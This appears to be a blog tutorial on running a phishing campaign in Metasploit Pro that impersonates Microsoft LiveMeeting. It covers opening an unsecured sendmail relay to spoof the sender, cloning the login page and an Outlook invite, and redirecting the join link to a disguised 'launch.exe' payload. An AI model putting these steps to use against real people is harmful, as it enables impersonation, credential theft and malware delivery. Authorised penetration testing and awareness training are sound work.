Social Engineering with Metasploit Pro!

Skill level: Novice

What you need:

– Light html editing skills
– Some place to host a file
– Can-do attitude

Since it’s release last month (and before during beta) I have been mucking about with some of the more advanced features included in Metasploit Professional. Being a deviant (in a past life), the most logical place to go first would be social engineering.

Today we are going to create a 3 pronged social engineering campaign leveraging Microsoft’s LiveMeeting as a platform. You can use whatever input floats your boat, but it’s best to use something that requires a local download of some sort. Pro provides a great framework for real-world web and email phishing, as well as a platform for security awareness training internally. Creation of the overall engagement is very straightforward in Pro, but there are a few extra things you can do to make it far more effective. I’ve created an example of how to use this functionality.

I started off by creating a new project. For those of you not familiar with Pro, it will look alien to you at first. A GUI-based Metasploit? I Say! Blasphemous! Unheard of!

Meh, stick with me…

If you’ve seen Metasploit Express before then this won’t look quite so radical, but you will notice a few new tabs across the top =].

Before I got started with the Campaign, there were a few prerequisites I needed to get out of the way. In order to run an email phishing campaign, I first needed an open relay to send my emails through so they could look like they were coming from LiveMeeting and not me. There are lots of open relays available on the internet (here’s a list I got from a buddy, unverified and some are blacklisted) but best practice is to get one from your ISP or create a little sendmail server yourself, which is what I did. I had heard many horror stories about how difficult Sendmail could be to configure correctly, but  I didn’t have any trouble with this instance. Easiest way to do it, pick a linux box (it can be the same one running Metasploit if you want) and run this command from a root terminal:

root@pracpwn:~# apt-get install sendmail

This will install the sendmail server and start it, this will be our open relay. Next, I needed a way to manage it because I sure as hell wasn’t doing it by command line. So. I got webmin from here( I have a Debian distro (Ubuntu 10.04) so i grabbed the Debian package. Once I got that installed, I browsed to:

<ip where you installed webmin and sendmail>:10000

If everything installed correctly, you will get a prompt that looks like this:

I Logged in using the credentials I use to log into my machine.

Next, I took off all the security to actually make my relay open. After all was said and done I went back and turned on a few aspects like authentication, SSL, etc but to get started I find it’s best to just get it working first =]. To do that I opened up the sendmail settings and turned everything to just run on port 25.

From here, click on Network Ports and check the default radio button as shown:

Save it, and now we’re ready to get into Metasploit Pro!

I then created a new Campaign. Once created, I choose all 3 types: Web, Email, and USB with this config:

Doesn’t really matter what you call the project, but I wanted to match the filename and from address as closely as possible to what a victim would be expecting. From here, I just clicked save and moved on to the web config.

This part was ridiculously easy. All I did was browse to my livemeeting login page (or your target page of choice), copy the page source and paste it into the HTML field. I have done this for several pages, and Pro is very consistent at being able to render these properly. For more advanced pwnage, you can also go in and modify the code to harvest usernames and passwords as well as make one of the buttons download a payload. By default, Pro starts a browser exploit onslaught as soon as the victim browses to this page. Of course, we don’t even need a web template if we can get it done with an email template.

I applied the same concept to my email template config as my web… grabbed an outlook invite with livemeeting info, copied the html from the invite and pasted it into the HTML field.

(Note: for calendar invites, outlook doesn’t let you copy the html directly so I copied the contents of the email and pasted them into NVU first (open source html editor). From there I converted the email to html and copied the html from there back into Pro).

From here I looked through the html for the link to the actual livemeeting (mine was called “Click to Join LiveMeeting”). I took note of this location and hit save.

Next was the list of email addresses. I didn’t have one at the time, so I just put in my gmail address as a test to make sure it works.

Now back at the main campaign page, I had everything set up. The only question was what to do with my new executable, so I decided to make my email template a little more potent. I created a directory structure on one of my hosted servers (livemeeting/meetings) and uploaded my executable to it so that it’s always available. The directory structure wasn’t necessary, but it makes the download look a little more authentic. Then I dug back into my email template config.

Remembering where my link was, I changed the href from the livemeeting site to re-direct to my executable for it to download. Since I named it “launch.exe”, it looks very similar to the “launch.rtc” file downloaded automatically by LiveMeeting. It doesn’t look exactly the same, but you’d be surprised how many ppl don’t really pay attention =].

So now I save that, enter my email addresses, run the campaign, sit back and wait for the sessions! Huzzah!

Keep in mind this is a very basic setup for social engineering, there are many other cool things you can do with this functionality combined with other technologies both in and out of Metasploit that I will write up when I have some time. Until then, enjoy!

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>